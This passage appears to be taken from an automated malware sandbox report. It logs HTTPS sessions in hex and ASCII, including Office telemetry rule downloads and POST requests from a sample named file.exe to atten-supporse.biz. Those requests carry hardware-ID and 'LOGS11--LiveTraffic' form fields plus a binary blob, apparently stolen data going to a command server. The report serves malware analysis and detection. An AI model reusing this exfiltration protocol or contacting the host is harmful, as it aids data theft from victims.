                                                                                                                                                                                    2024-11-29 18:49:15 UTC15057OUTData Raw: 2d 2d 4f 37 50 33 48 39 47 49 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 46 30 43 36 44 39 43 43 35 32 30 45 31 37 32 32 45 46 41 33 44 36 33 42 36 39 45 37 43 41 31 34 0d 0a 2d 2d 4f 37 50 33 48 39 47 49 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 4f 37 50 33 48 39 47 49 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 4f 47 53 31 31 2d 2d 4c 69 76 65 54 72 61 66 66 69 63 0d 0a 2d 2d 4f 37 50 33 48 39 47 49 35 0d 0a 43 6f 6e 74 65 6e
                                                                                                                                                                                    Data Ascii: --O7P3H9GI5Content-Disposition: form-data; name="hwid"F0C6D9CC520E1722EFA3D63B69E7CA14--O7P3H9GI5Content-Disposition: form-data; name="pid"2--O7P3H9GI5Content-Disposition: form-data; name="lid"LOGS11--LiveTraffic--O7P3H9GI5Conten
                                                                                                                                                                                    2024-11-29 18:49:16 UTC1024INHTTP/1.1 200 OK
                                                                                                                                                                                    Date: Fri, 29 Nov 2024 18:49:16 GMT
                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                    Connection: close
                                                                                                                                                                                    Set-Cookie: PHPSESSID=3hr79u24nckmi7br49dftqbdaf; expires=Tue, 25-Mar-2025 12:35:54 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                    Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                    Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                                    CF-Cache-Status: DYNAMIC
                                                                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=LFu4abuUh%2Bq%2BURjRlz%2FjDb0jJvWuZL4GWEfEkQLYH7PH6gllqoxrYghaqvs0aAv5Ncb1OPzxZNavD0mNq%2FFh1RGepMuC5ZmDXW3Ndb1mqusiVDiBc%2Fg55xR2j7I5ohe6FELff6E%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                    Server: cloudflare
                                                                                                                                                                                    CF-RAY: 8ea4c6cf78bf41d8-EWR
                                                                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                    server-timing: cfL4;desc="?proto=TCP&rtt=1616&min_rtt=1611&rtt_var=615&sent=12&recv=20&lost=0&retrans=0&sent_bytes=2845&recv_bytes=15990&delivery_rate=1765417&cwnd=215&unsent_bytes=0&cid=9c93e5128e37c587&ts=1016&x=0"
                                                                                                                                                                                    2024-11-29 18:49:16 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 32 32 38 0d 0a
                                                                                                                                                                                    Data Ascii: fok 8.46.123.228
                                                                                                                                                                                    2024-11-29 18:49:16 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                    Data Ascii: 0


                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                    5192.168.2.64971213.107.246.63443
                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                    2024-11-29 18:49:16 UTC195OUTGET /rules/other-Win32-v19.bundle HTTP/1.1
                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                    Accept-Encoding: gzip
                                                                                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                                                                                    2024-11-29 18:49:17 UTC471INHTTP/1.1 200 OK
                                                                                                                                                                                    Date: Fri, 29 Nov 2024 18:49:17 GMT
                                                                                                                                                                                    Content-Type: text/plain
                                                                                                                                                                                    Content-Length: 218853
                                                                                                                                                                                    Connection: close
                                                                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                                                                    Cache-Control: public
                                                                                                                                                                                    Last-Modified: Wed, 27 Nov 2024 15:11:14 GMT
                                                                                                                                                                                    ETag: "0x8DD0EF5BC53602D"
                                                                                                                                                                                    x-ms-request-id: a5a19dc6-401e-008c-1dff-4086c2000000
                                                                                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                                                                                    x-azure-ref: 20241129T184917Z-174f78459688l8rvhC1EWRtzr00000000cz0000000005h71
                                                                                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                    X-Cache: TCP_HIT
                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                    2024-11-29 18:49:17 UTC15913INData Raw: 31 30 30 30 76 35 2b 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 30 30 30 22 20 56 3d 22 35 22 20 44 43 3d 22 45 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 52 75 6c 65 45 72 72 6f 72 73 41 67 67 72 65 67 61 74 65 64 22 20 41 54 54 3d 22 66 39 39 38 63 63 35 62 61 34 64 34 34 38 64 36 61 31 65 38 65 39 31 33 66 66 31 38 62 65 39 34 2d 64 64 31 32 32 65 30 61 2d 66 63 66 38 2d 34 64 63 35 2d 39 64 62 62 2d 36 61 66 61 63 35 33 32 35 31 38 33 2d 37 34 30 35 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 53 3d 22 37 30 22 20 44 4c 3d 22 41 22 20 44 43 61 3d 22 50 53 50 20 50 53 55 22 20
                                                                                                                                                                                    Data Ascii: 1000v5+<?xml version="1.0" encoding="utf-8"?><R Id="1000" V="5" DC="ESM" EN="Office.Telemetry.RuleErrorsAggregated" ATT="f998cc5ba4d448d6a1e8e913ff18be94-dd122e0a-fcf8-4dc5-9dbb-6afac5325183-7405" SP="CriticalBusinessImpact" S="70" DL="A" DCa="PSP PSU"
                                                                                                                                                                                    2024-11-29 18:49:17 UTC16384INData Raw: 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 42 22 20 49 3d 22 35 22 20 4f 3d 22 66 61 6c 73 65 22 3e 0d 0a 20 20 20 20 3c 4f 20 54 3d 22 41 4e 44 22 3e 0d 0a 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4f 20 54 3d 22 47 45 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 34 30 30 22 20 54 3d 22 49 33 32 22 20 2f 3e 0d 0a 20
                                                                                                                                                                                    Data Ascii: /> </R> </O> </R> </O> </C> <C T="B" I="5" O="false"> <O T="AND"> <L> <O T="GE"> <L> <S T="1" F="0" /> </L> <R> <V V="400" T="I32" />
                                                                                                                                                                                    2024-11-29 18:49:17 UTC16384INData Raw: 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 30 38 32 30 22 20 56 3d 22 33 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 4f 75 74 6c 6f 6f 6b 2e 44 65 73 6b 74 6f 70 2e 43 6f 6e 74 61 63 74 43 61 72 64 50 72 6f 70 65 72 74 69 65 73 43 6f 75 6e 74 73 22 20 41 54 54 3d 22 64 38 30 37 36 30 39 32 37 36 37 34 34 32 34 35 62 61 66 38 31 62 66 37 62 63 38 30 33 33 66 36 2d 32 32 36 38 65 33 37 34 2d 37 37 36 36 2d 34 39 37 36 2d 62 65 34 34 2d 62 36 61 64 35 62 64 64 63 35 62 36 2d 37 38 31 33 22 20 44 43 61 3d 22 50 53 55 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 41 20 54 3d 22 31 22 20 45 3d 22 54 65 6c 65 6d 65 74 72 79 53 68 75 74 64 6f 77 6e 22 20 2f 3e 0d
                                                                                                                                                                                    Data Ascii: .0" encoding="utf-8"?><R Id="10820" V="3" DC="SM" EN="Office.Outlook.Desktop.ContactCardPropertiesCounts" ATT="d807609276744245baf81bf7bc8033f6-2268e374-7766-4976-be44-b6ad5bddc5b6-7813" DCa="PSU" xmlns=""> <S> <A T="1" E="TelemetryShutdown" />
                                                                                                                                                                                    2024-11-29 18:49:17 UTC16384INData Raw: 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 39 22 20 4f 3d 22 74 72 75 65 22 20 4e 3d 22 50 75 72 67 65 64 5f 41 67 65 22 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22 34 22 20 46 3d 22 43 6f 75 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 31 30 22 20 4f 3d 22 74 72 75 65 22 20 4e 3d 22 50 75 72 67 65 64 5f 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22 35 22 20 46 3d 22 43 6f 75 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 31 31 22 20 4f 3d 22 74 72 75 65 22 20 4e 3d 22 46 69 6c 65 5f 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22 38 22 20 46 3d 22 43 6f 75 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20
                                                                                                                                                                                    Data Ascii: </C> <C T="U32" I="9" O="true" N="Purged_Age"> <S T="4" F="Count" /> </C> <C T="U32" I="10" O="true" N="Purged_Count"> <S T="5" F="Count" /> </C> <C T="U32" I="11" O="true" N="File_Count"> <S T="8" F="Count" /> </C>
                                                                                                                                                                                    2024-11-29 18:49:17 UTC16384INData Raw: 20 20 3c 53 20 54 3d 22 31 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 31 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 43 6f 75 6e 74 5f 43 72 65 61 74 65 43 61 72 64 5f 56 61 6c 69 64 4d 61 6e 61 67 65 72 5f 46 61 6c 73 65 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 32 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 43 6f 75 6e 74 5f 43 72 65 61 74 65 52 65 73 75 6c 74 5f 56 61 6c 69 64 50 65 72 73 6f 6e 61 5f 46 61 6c 73 65 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 32 22 20 2f 3e 0d 0a 20
                                                                                                                                                                                    Data Ascii: <S T="10" /> </C> </C> <C T="U32" I="1" O="false" N="Count_CreateCard_ValidManager_False"> <C> <S T="11" /> </C> </C> <C T="U32" I="2" O="false" N="Count_CreateResult_ValidPersona_False"> <C> <S T="12" />
                                                                                                                                                                                    2024-11-29 18:49:17 UTC16384INData Raw: 50 61 69 6e 74 5f 49 4d 73 6f 50 65 72 73 6f 6e 61 5f 57 61 73 4e 75 6c 6c 5f 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 33 32 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 32 30 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 50 61 69 6e 74 5f 49 4d 73 6f 50 65 72 73 6f 6e 61 5f 4e 75 6c 6c 5f 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 33 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 32 31 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 43 6c 65 61 6e 75 70 4d 73 6f 50 65 72 73 6f 6e 61 5f 49 4d 73 6f 50 65 72 73 6f 6e
                                                                                                                                                                                    Data Ascii: Paint_IMsoPersona_WasNull_Count"> <C> <S T="32" /> </C> </C> <C T="U32" I="20" O="false" N="Paint_IMsoPersona_Null_Count"> <C> <S T="33" /> </C> </C> <C T="U32" I="21" O="false" N="CleanupMsoPersona_IMsoPerson
                                                                                                                                                                                    2024-11-29 18:49:17 UTC16384INData Raw: 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 32 30 30 22 20 54 3d 22 49 36 34 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 4f 20 54 3d 22 4c 54 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 33 22 20 46 3d 22 52 65 74 72 69 65 76 61 6c 4d 69 6c 6c 69 73 65 63 6f 6e 64 73 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 34 30 30 22
                                                                                                                                                                                    Data Ascii: <R> <V V="200" T="I64" /> </R> </O> </L> <R> <O T="LT"> <L> <S T="3" F="RetrievalMilliseconds" /> </L> <R> <V V="400"
                                                                                                                                                                                    2024-11-29 18:49:17 UTC16384INData Raw: 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 30 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 4f 63 6f 6d 32 49 55 43 4f 66 66 69 63 65 49 6e 74 65 67 72 61 74 69 6f 6e 46 69 72 73 74 43 61 6c 6c 53 75 63 63 65 73 73 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 31 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 4f 63 6f 6d 32 49 55 43 4f 66 66 69 63 65 49 6e 74 65 67 72 61 74 69 6f 6e 46 69 72 73 74 43 61 6c 6c 46 61 69 6c 65 64 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43
                                                                                                                                                                                    Data Ascii: </S> <C T="U32" I="0" O="false" N="Ocom2IUCOfficeIntegrationFirstCallSuccessCount"> <C> <S T="9" /> </C> </C> <C T="U32" I="1" O="false" N="Ocom2IUCOfficeIntegrationFirstCallFailedCount"> <C> <S T="10" /> </C
                                                                                                                                                                                    2024-11-29 18:49:17 UTC16384INData Raw: 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 33 22 20 46 3d 22 54 65 6e 61 6e 74 20 65 6e 61 62 6c 65 64 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 33 22 20 46 3d 22 55 73 65 72 20 65 6e 61 62 6c 65 64 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 66 61 6c 73 65 22 20 54 3d 22 42 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 20 20 20 20 20
                                                                                                                                                                                    Data Ascii: L> <S T="3" F="Tenant enabled" /> </L> <R> <O T="EQ"> <L> <S T="3" F="User enabled" /> </L> <R> <V V="false" T="B" /> </R>
                                                                                                                                                                                    2024-11-29 18:49:17 UTC16384INData Raw: 75 73 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 34 30 34 22 20 54 3d 22 55 33 32 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 20 20 3c 2f 46 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 37 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 41 4e 44 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 4f 20 54 3d 22 47 45 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 32 22 20 46 3d 22 48 74 74 70 53 74 61 74 75 73 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20
                                                                                                                                                                                    Data Ascii: us" /> </L> <R> <V V="404" T="U32" /> </R> </O> </F> <F T="7"> <O T="AND"> <L> <O T="GE"> <L> <S T="2" F="HttpStatus" /> </L>


                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                    6192.168.2.649713104.21.16.94431656C:\Users\user\Desktop\file.exe
                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                    2024-11-29 18:49:17 UTC281OUTPOST /api HTTP/1.1
                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                    Content-Type: multipart/form-data; boundary=TCMIPNPM4I2WDJ2
                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                    Content-Length: 19951
                                                                                                                                                                                    Host: atten-supporse.biz
                                                                                                                                                                                    2024-11-29 18:49:17 UTC15331OUTData Raw: 2d 2d 54 43 4d 49 50 4e 50 4d 34 49 32 57 44 4a 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 46 30 43 36 44 39 43 43 35 32 30 45 31 37 32 32 45 46 41 33 44 36 33 42 36 39 45 37 43 41 31 34 0d 0a 2d 2d 54 43 4d 49 50 4e 50 4d 34 49 32 57 44 4a 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 54 43 4d 49 50 4e 50 4d 34 49 32 57 44 4a 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 4f 47 53 31 31 2d 2d 4c 69 76 65 54 72 61 66 66 69 63 0d 0a 2d
                                                                                                                                                                                    Data Ascii: --TCMIPNPM4I2WDJ2Content-Disposition: form-data; name="hwid"F0C6D9CC520E1722EFA3D63B69E7CA14--TCMIPNPM4I2WDJ2Content-Disposition: form-data; name="pid"3--TCMIPNPM4I2WDJ2Content-Disposition: form-data; name="lid"LOGS11--LiveTraffic-
                                                                                                                                                                                    2024-11-29 18:49:17 UTC4620OUTData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 80 1b 8d 0e 2b 03 3f 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c b8 d1 e8 b0 32 f0 c3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 80 1b 8b 0e 2b 03 3f 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c b8 d1 e8 b0 32 f0 c3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 80 1b 8d 0e 2b 03 3f 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c b8 b1 e8 ef fa 6f c5 82 3f 0c fe 4d 70 35 98 09 ee b9 f1 d3 1b 7f 70 e3 5f de a8 de f8 f4 8d d8 f5 6f 86 49 00
                                                                                                                                                                                    Data Ascii: +?2+?2+?o?Mp5p_oI
                                                                                                                                                                                    2024-11-29 18:49:18 UTC1022INHTTP/1.1 200 OK
                                                                                                                                                                                    Date: Fri, 29 Nov 2024 18:49:18 GMT
                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                    Connection: close
                                                                                                                                                                                    Set-Cookie: PHPSESSID=8ti083cnitauf1k40e5jqkobjq; expires=Tue, 25-Mar-2025 12:35:57 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                    Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                    Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                                    CF-Cache-Status: DYNAMIC
                                                                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=NGtTnnuHukSMQJwhNfXaE9sNiZfKOKH27o%2BwciEaDDfaC0gefvGGajVB8mpxDDGlLv9qMkO%2BUQ5ZCy6Za%2BzLn5QRMWKSFr2nG77z7vV3NAT4%2Fd1SutI8m8PaPRGZlMmOAHkVE7A%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                    Server: cloudflare
                                                                                                                                                                                    CF-RAY: 8ea4c6deda928cec-EWR
                                                                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                    server-timing: cfL4;desc="?proto=TCP&rtt=1812&min_rtt=1808&rtt_var=687&sent=13&recv=25&lost=0&retrans=0&sent_bytes=2845&recv_bytes=20912&delivery_rate=1581798&cwnd=199&unsent_bytes=0&cid=f8ba4c823811143f&ts=1253&x=0"
                                                                                                                                                                                    2024-11-29 18:49:18 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 32 32 38 0d 0a
                                                                                                                                                                                    Data Ascii: fok 8.46.123.228
                                                                                                                                                                                    2024-11-29 18:49:18 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                    Data Ascii: 0


                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                    7192.168.2.64971513.107.246.63443
                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                    2024-11-29 18:49:19 UTC192OUTGET /rules/rule224902v2s19.xml HTTP/1.1
                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                    Accept-Encoding: gzip
                                                                                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                                                                                    2024-11-29 18:49:20 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                    Date: Fri, 29 Nov 2024 18:49:19 GMT
                                                                                                                                                                                    Content-Type: text/xml
                                                                                                                                                                                    Content-Length: 450
                                                                                                                                                                                    Connection: close
                                                                                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:27:25 GMT
                                                                                                                                                                                    ETag: "0x8DC582BD4C869AE"
                                                                                                                                                                                    x-ms-request-id: 59158d4f-901e-00a0-5491-3f6a6d000000
                                                                                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                                                                                    x-azure-ref: 20241129T184919Z-174f7845968cdxdrhC1EWRg0en00000010ag000000007ds1
                                                                                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                    X-Cache: TCP_HIT
                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                    2024-11-29 18:49:20 UTC450INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 32 32 34 39 30 32 22 20 56 3d 22 32 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 31 30 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 55 54 53 20 54 3d 22 32 22 20 49 64 3d 22 62 62 72 35 71 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 53 20 54 3d 22 33 22 20 47 3d 22 7b 61 33 36 61 39 37 30 64 2d 34 35 61 39 2d 34 65 30 64 2d 39 63 61 62 2d 32 61 32 33 35 63 63 39 64 37 63 36 7d 22 20 2f 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 47 22 20 49 3d 22 30 22 20 4f 3d 22 66 61 6c 73 65 4e
                                                                                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="224902" V="2" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120100" /> <UTS T="2" Id="bbr5q" /> <SS T="3" G="{a36a970d-45a9-4e0d-9cab-2a235cc9d7c6}" /> </S> <C T="G" I="0" O="falseN


                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                    8192.168.2.64971413.107.246.63443
                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                    2024-11-29 18:49:19 UTC193OUTGET /rules/rule120402v21s19.xml HTTP/1.1
                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                    Accept-Encoding: gzip
                                                                                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                                                                                    2024-11-29 18:49:20 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                    Date: Fri, 29 Nov 2024 18:49:19 GMT
                                                                                                                                                                                    Content-Type: text/xml
